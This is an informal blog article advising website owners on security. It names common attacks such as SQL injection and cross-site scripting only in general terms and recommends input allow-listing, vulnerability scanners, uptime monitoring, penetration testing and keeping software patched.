Information is everything. The web is full of free information for everyone to use but there are things that webmasters don’t want people to know, things that should be kept away from prying eyes. Be it an exclusive section on your website for premium users or content that thousands of users use, it is best that you stuff-up your arsenal to avoid things go awry.
There is no such thing as an unhackable website, there are just those who are close to it or are offline. It is important to know how attacks are made in order to plan ahead.
Attacker’s Point of View
Image by: Benjamin Earwicker
First thing a hacker might want to know is information about your host and OS. From this they will learn of existing vulnerabilities, if there are, and hack their way in to your system. So choosing a web hosting that cares about security is very important, especially if you are on shared hosting where you are at the mercy of your host.
With today’s technology most websites have become more interactive where users can request and input data, personalize and manipulate the site. But interactivity provides loopholes in security. A good hacker will scan a target website thoroughly just to gain access to its server.
More below for in-depth discussion about attacks.
When a Hacker Attacks
Image by: eddmun
An experienced hacker does not attack blindly. When he attacks, he attacks with conviction (or curiosity). Usually they are armed with vital information that they can use to destabilize your site. Below are some of the most common forms of attacks:
- Authorization Bypass
- SQL Injection
- Cross-site Scripting(XSS)
Defacement is common for government and celebrity websites as well as other innocent ones. Attacks like this can range from an act of retaliation to just simply for fun.
A successful authorization bypass will make you shout “this is my code, not yours!” Some hackers would actually want to have a piece of your code either to make a clone out of it or to destroy it.
Then there is what we call SQL injection where the attacker inserts SQL queries in unsuspecting forms to extract information from the database that is not usually available even to your users: passwords, e-mails, and things you don’t want people to know. How will it impact you if a hacker drops your most important table and you do not have any back-up? Ouch!
Another form of attack is Cross-site Scripting (XSS). Bad guy messes up with the good guys. What makes this kind of attack evil is it is easy to defend against but hard to detect. How will you defend if you are caught by surprise?
Image by: Ramasamy Chidambaram
I remember writing and submitting a simple script in an input field of a friend’s website which caused all users to see a pop-up whenever they load the homepage and be redirected to another website. Instant chaos. Of course this matter is easily fixed by simple input validation.
Image by: wikkedhill
Perhaps the best way to validate user input is not by specifying the should nots but by telling what is only allowed. To specify is to exclude. Less time and effort. Neat.
Security Guy Should Know
Image by: Julien Tromeur
There are many 3rd-party applications today, rate of birth is almost the same as Moore’s law. But is the guy in charge of security knowledgeable enough about these 3rd-party applications and the vulnerabilities they bring? If not, then trouble is looming, or you might opt to write your own modules.
Security guy should also know about Google Hack. Is Google still your friend? With advanced search query even the most seemingly impenetrable server text files can be harvested for everyone to see. By knowing what Robots.txt is, this form of attack can be stopped..for a while.
You can download Acunetix and BeyondSecurity’s trial scanners and find out flaws in and out of your website.
Although some good services do not come free, at least your website is secured.
If your CMS is WordPress refer to this comprehensive guide on Hardening WordPress.
Monitor Website Uptime
Image by: Chris Cockram
Is your website still working? Are people enjoying your services while you are away from your keyboard? You and security guy can’t be monitoring your website 24 hours a day just to maintain its availability (and stability), it’s just impossible. Let someone do the monitoring for you. SiteUptime‘s service will alert you via SMS or e-mail if your website becomes unavailable. Some companies offering similar services are HostTracker, Internetseer, and WebSitePulse. Now every time you receive an SMS you will automatically think your website is down.
Hacked? It’s Not the End
If you feel like your security has been compromised, or really has been, do not act calmly. Connect to your FTP like your life is on the line and, if successful, change your password immediately to avoid further damage. Now you may breathe slowly. But in the event of failing to connect to your FTP you should immediately contact and notify the authorities for them to investigate the crime scene and your web host to regain your access as soon as possible.
I know it is hard to take your website offline, but in the case of your website being infected by a virus that attacks your visitors..take it offline, you must. Another way to take good care of them.
There are actually many forms of attacks, methodically these happen through FTP and through CGI vulnerabilities. It is wise to do research on your applications for known vulnerabilities and if there are available patches. Always keep yourself, and your applications, updated!
Prevention is Better Than Cure
If you think you’ve done all what you can to secure your website but something still feels lacking, you might want to hire proven-and-tested security experts to try and break into your site, legally. They do not come cheap of course.
Below are experts in finding vulnerabilities, they offer almost the same services and boasts notable clients. Meet the good guys.
News and Updates
Updates are made in order to patch-up loopholes and add features. Not aware that something is wrong with your current applications? A good way to know if your website is secured is to learn of the current exploits that users and developers from around the web has found. There you, or your security guy, can formulate what to do next to patch it up. A comprehensive, and current, list of exploits can be found at Exploit-DB.com. Prevention is better than cure, as they say.
Also, be up to date of the current attacks that happen globally. A good news site about cyber attacks and other security news is CyberInsecure.com. Another gem that I found is SecurityFocus.com, it provides easy browsing of hundreds of vendors’ vulnerabilities. Sleek.
A person who is always up to date is never caught off guard. Good luck to all!